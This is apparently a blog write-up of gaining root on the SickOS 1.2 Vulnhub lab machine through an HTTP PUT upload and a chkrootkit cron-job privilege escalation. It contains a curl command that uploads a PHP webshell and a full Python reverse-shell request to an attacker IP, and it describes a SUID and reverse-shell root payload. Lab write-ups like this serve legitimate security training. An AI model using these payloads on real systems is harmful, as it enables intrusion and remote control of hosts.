This post describe the necessary steps to gain root in SickOS 1.2 available on Vulnhub (https://www.vulnhub.com/). This box, according to the autor D4rk ( https://twitter.com/D4rk36), is similar with the machines in the OSCP labs.
Machine Name: SickOs: 1.2
Resource URL: https://www.vulnhub.com/entry/sickos-12,144/
Release Data: 27 Apr 2016
Summary
To obtain administrative access in this box, the follow kill chain have been executed.
- Footprint against the target detect the port 80/TCP and 22/TCP as open.
- Fingerprint against web application at port 80/TCP reveals /test/ directory. This directory has HTTP PUT method enabled and allow the attacker to upload malicious files and obtain foothold in the server.
- In the privilege escalation, under privileges of user www-data (uid 33), recon identify a vulnerable version of chkrootkit software.
- Abusing the crontab, the attacker exploit the chkrootkit vulnerability and gain root access.
A quick note before we start, for some reason the autor of this box create the crontab routine to execute daily(only execute at 6AM or something like that), this configuration forces the attacker to wait. I hack into the grub and got a root shell in the process of starting the VM and change the crontab configuration to execute ever five minutes.
Here are some links related with gain root shell abusing the grub, in case you want to configure your crontab to less painfull.
- https://linoxide.com/linux-how-to/boot-root-shell-prompting-password/
- http://www.c-integration.com/blog/showpost.php/83-reset-linux-root-password-without-knowing-the-password
WriteUp
Recon
In the recon step, using the nmap tool, the port 80/TCP has been identifyed running a web server lighttpd 1.4.28.
In the web application provided by the service lighttpd 1.4.28, the gobuster (https://github.com/PentestBox/gobuster) was used to send a bruteforce attack against files and directories and identified the index.php file and /test/ directory.
In the index.php has no information that could be used to compromissed the box.
At the directory /test/, the recon identified the HTTP PUT method enabled.
Exploitation
The HTTP PUT method enabled allowed the attacker to upload arbitrary files to the target server, some different forms of exploit this vulnerability has been tested, using nmap, metasploit console ( msfconsole)and curl, all techniques return success in the upload procedure.
# Abusing PUT method with CURL to upload arbitrary files in the server.
curl -X PUT -d '<?php system($_GET["c"]);' http://192.168.56.103/test/1.php
The arbitrary file uploaded to the target system allowed the attacker to execute remote commands. The attacker use the webshell uploaded previsoly to gain the initial foothold in the server. The first shell in the system is running under user www-data (uid 33).The follow request to the webshell execute a python reverse shell and connect back to the attacker machine.
http://192.168.1.115/test/msfupload.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.144%22,8080));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
Privilege Escalation
In the privilege escalation step, the tool Linux Exploit Suggester (https://github.com/mzet-/linux-exploit-suggester) it was used against the target system and identify the chkrootkit vulnerability.
The paper about the chkrootkit vulnerability (https://www.exploit-db.com/exploits/33899) reveals that the /tmp directory must be set with noexec and mounted in order to obtain success in the attack.
The /tmp directory is properly monted and has no flag noexec enabled.
In order to exploit this vulnerability, the attacker created the /tmp/upload file, that file will be executed and the instructions inside the file will run under root privileges. In the update (/tmp/update) file, some commands to check the execution of the file and 2 ways to obtain root access in the server has been placed, the first is creating a SUID binary and put under root privileges, then the attacker can execute the binary and get root acccess and the second is a python script which will connect back to the attackr machine and spawn a shell under root privileges.
When the crontab routine execute, some files are create in the /tmp directory and the attacker can execute the binary file to get root access.
The crontab routine execute the python script which send a reverse shell to attacker machine. The reverse shell is running under root privileges, granting to the attacker administrative access. With root access, the flag is owned.
Conclusion
This box is pretty fun, straight for hacking. I has been stucked in the recon step because I never see a PUT HTTP method which are really exploitable in the real world. To identify the PUT vulnerability I took me while . After this, the chkrootkit vulnerability is something new to mee too, is a weird exploit and if you don’t know, the chkrootkit is a software in the security area, this software check if has any signs of rootkits in the system, is something like exploit the anti virus, is the last thing I check because in the first moment I thinked is less probably os success. The daily crontab routine is nonsense, I took a lot of time in this machine because of this, waiting the crontab execute the chkrootkit routine, after a lot of time waiting I hack the grub and change the crontab to five minutes, make life easier, right?
Resources
- WriteUp: https://g0blin.co.uk/sickos-1.2-vulnhub-writeup/
- WriteUp: https://volta-sec.blogspot.com/2016/10/vulnhub-sickos-12.html
- Reverse Shells Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- Chkrootkit Exploit: https://www.exploit-db.com/exploits/33899
- Exploiting-put-method PUT HTTP Method: https://www.hackingarticles.in/multiple-ways-to-exploiting-put-method/
- GoBuster: https://github.com/PentestBox/gobuster